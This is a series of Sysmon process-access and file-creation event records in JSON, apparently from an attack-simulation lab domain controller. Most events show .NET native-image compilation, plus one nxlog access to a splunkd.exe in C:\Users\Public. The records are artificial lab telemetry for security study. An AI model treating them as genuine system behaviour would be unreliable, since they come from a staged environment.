{"EventTime":"2020-08-01 07:02:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8712,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:46.451\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:46.451","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8713,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:46.576\r\nProcessGuid: {E2A3D6B1-1395-5F25-0000-00109C491000}\r\nProcessId: 2888\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b48-0\\System.Web.Mobile.dll\r\nCreationUtcTime: 2020-08-01 07:02:46.576","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:46.576","ProcessGuid":"{E2A3D6B1-1395-5F25-0000-00109C491000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b48-0\\System.Web.Mobile.dll","CreationUtcTime":"2020-08-01 07:02:46.576","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8714,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:46.638\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1396-5F25-0000-0010C04E1000}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:46.638","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1396-5F25-0000-0010C04E1000}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8715,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:46.638\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1396-5F25-0000-0010C04E1000}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:46.638","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1396-5F25-0000-0010C04E1000}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8716,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:46.638\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1396-5F25-0000-0010C04E1000}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:46.638","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1396-5F25-0000-0010C04E1000}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8717,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:46.670\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1396-5F25-0000-0010E7511000}\r\nTargetProcessId: 3140\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:46.670","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1396-5F25-0000-0010E7511000}","TargetProcessId":"3140","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8718,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:46.670\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1396-5F25-0000-0010E7511000}\r\nTargetProcessId: 3140\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:46.670","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1396-5F25-0000-0010E7511000}","TargetProcessId":"3140","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8719,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:46.685\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1396-5F25-0000-0010E7511000}\r\nTargetProcessId: 3140\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:46.685","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1396-5F25-0000-0010E7511000}","TargetProcessId":"3140","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8720,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:46.904\r\nProcessGuid: {E2A3D6B1-1396-5F25-0000-0010E7511000}\r\nProcessId: 3140\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c44-0\\System.Web.RegularExpressions.dll\r\nCreationUtcTime: 2020-08-01 07:02:46.904","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:46.904","ProcessGuid":"{E2A3D6B1-1396-5F25-0000-0010E7511000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c44-0\\System.Web.RegularExpressions.dll","CreationUtcTime":"2020-08-01 07:02:46.904","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
